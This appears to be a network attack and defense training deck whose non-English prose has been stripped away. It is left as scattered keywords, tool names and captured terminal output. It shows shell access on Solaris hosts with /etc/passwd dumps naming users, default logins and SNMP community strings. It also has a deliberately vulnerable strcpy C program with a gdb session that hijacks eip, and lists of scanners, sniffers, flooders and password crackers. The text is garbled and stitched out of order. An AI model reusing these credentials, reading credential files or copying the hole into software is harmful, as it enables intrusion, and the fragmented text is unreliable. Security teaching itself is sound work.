Network Attack and Defense Techniques
SYN
SYN ACK /SYN
tcp connect
ISP
OSSun Solaris Firewall
uid=2(bin) gid=2(bin) / SunOS 5.7 Generic sun4u sparc SUNW,Ultra-
ILMI
vcn_xx
XX
80root:admin telnet test:test su root:admin xx
RPC-DCOM
2
cd
radius telnet
2
uid=2(bin) gid=2(bin)
SunOS rad 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
cat /etc/passwd
hostname rad
root:x:0:1:Super-User:/:/usr/bin/csh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:/bin/sh
lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/sh
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
ppeng:x:1004:10:Free user:/home1/usr/pengpeng:/bin/passwd
zhzhu:x:1007:10:director manager:/home1/usr/zhzhu:/bin/passwd
mjiang:x:1008:10:Admin user:/home1/usr/mjiang:/bin/passwd
crsc_tc:x:1052:10:normal user:/home1/usr/crsc_tc:/bin/passwd
import1:x:1054:10:normal user:/home1/usr/import1:/bin/passwd
zodzl:x:1055:10:normal user:/home1/usr/zodzl:/bin/passwd
jdp:x:1056:10:normal user:/home1/usr/jdp:/bin/passwd
Li_Yuren:x:1057:10:normal user:/home1/usr/Li_Yuren:/bin/passwd
twxst:x:1059:10:normal user:/home1/usr/twxst:/bin/passwd
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0xbffffc60      -1073742752
ecx            0x564eff41      1448017729
edx            0x57500042      1464860738
2
wwwx.x.x.197 x.x.x.195 ACEswitch 180e
SNMP private
IP Address
x.x.4.5
System Name
xx7513
Contact
Location
Cisco Internetwork Operating System Software
IOS (tm) RSP Software (RSP-ISV-M), Version 12.0(5)T1, RELEASE SOFTWARE (fc1)
WIN
MD5
MD5
MD5(admin,32) = 21232f297a57a5a743894a0e4a801fc3
MD5(admin,16) = 7a57a5a743894a0e
WebProxy SPIKE Proxy SQL
SQL SQLSQL Injection
SQL
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Thu 19-Aug-99 01:39 by cmong
Read-Only Community Strings ILMI public vcn_xx xxxGSR vcn_xxx
Read-Write Community Strings
NBSI Domain3.6
Phishing
eBay
"" ""
MP3
(IE / Firefox) IM (MSN / QQ) Office (Word)
Email
1
2Email telnetEmail Email
DoS / DDoS
DoS (Denial of Service)
WEB FTP Mail
SNMP
Nessus Unix GTKJavaWin
Nessus
Client
Server
Targets
X-Scan
X-Scan
ISS Internet Security Scanner
SSS (Shadow Security Scanner)
Retina Network Security Scanner (eEye)
LANguard Network Security Scanner
CyberCop Scanner (NAI)
Telnet 80WEB
banner
TCP/IP
TCP/IP
TTL Windows ToS DF ISN MSS
DDoS (Distributed Denial of Service)
nuke)
SYN Flood ICMP Flood UDP Flood Ping of Death
CGI winnuke
SYN Flood
SYN
ACK /SYN
ACK
SYN Flood
HUB
Switch
ARP
sniffer
passwd
$%@&)*=-~`^,{
(Promiscuous) MAC
POP3 Ftp Telnet
ifconfig (UNIX)
DNS
AntiSniff (for win / for unix), Promiscan
Ethereal() Windump(http://windump.polito.it/) Xsniff()
$ /sbin/ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
        inet 127.0.0.1 netmask ff000000
hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST> mtu 1500
        inet xx.151.243.78 netmask ffffffc0 broadcast xx.151.243.127
--
Windows
2006(ms06040) 2006
(1)
IP OS (2)Whois Ping Traceroute Nslookup
1. 2.
3.sniffer? 4.DOS? 6.TCP/IP
?
Nessus() X-Scan()
Google Hacking
inurl: intext: Intitle: filetype:
: B/SC/S
Internet Explorer
> 1024
IE
...
Windows
IP
WIN()
TCP SYN
TCP
SYN
SYN+ACK
SYN
RST
SYN
Nmap for Unix / for Win (Libpcap / Winpcap): -sS, -sT (connect()), -sU (udp), -O, -P0 (ping), -p, -v
NmapWin v1.3.0
SuperScan Windows 4.0
ebx            0x40162154      1075192148
esp            0xbffffc80      0xbffffc80
ebp            0x41414141      0x41414141
esi            0x400168e4      1073834212
edi            0xbffffd04      -1073742588
eip            0x42424242      0x42424242
....
}
[wlj@debian wlj]$ gcc -o vul vul.c
[wlj@debian wlj]$ gdb ./vul -q
(gdb) r `perl -e 'print "A"x28'`BBBB
Starting program: /home/wlj/./vul `perl -e 'print "A"x28'`BBBB
Metasploit (/)
-
#include <string.h>

void function(char *str) {
    char buffer[16];     /* 16-byte stack buffer; strcpy has no bounds check, so a longer argv[1] overwrites the saved ebp/eip (the overflow this example is meant to show) */
    strcpy(buffer, str);
}

int main(int argc, char **argv) {
    if (argc > 1) function(argv[1]);
    return 0;
}
cat /etc/passwd
root:x:0:1:Super-User:/:/bin/csh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
Web
/neolabs/neo-ports/neo-ports.html
TCP/IP IP
ICMP (TOS) TCP/IP SYN FLOOD TCP
Nmap() Superscan() Sl()
Hydra(/) Brutus X-Scan()
,ftp pop3
FTP
John(/john/) L0pht Crack5()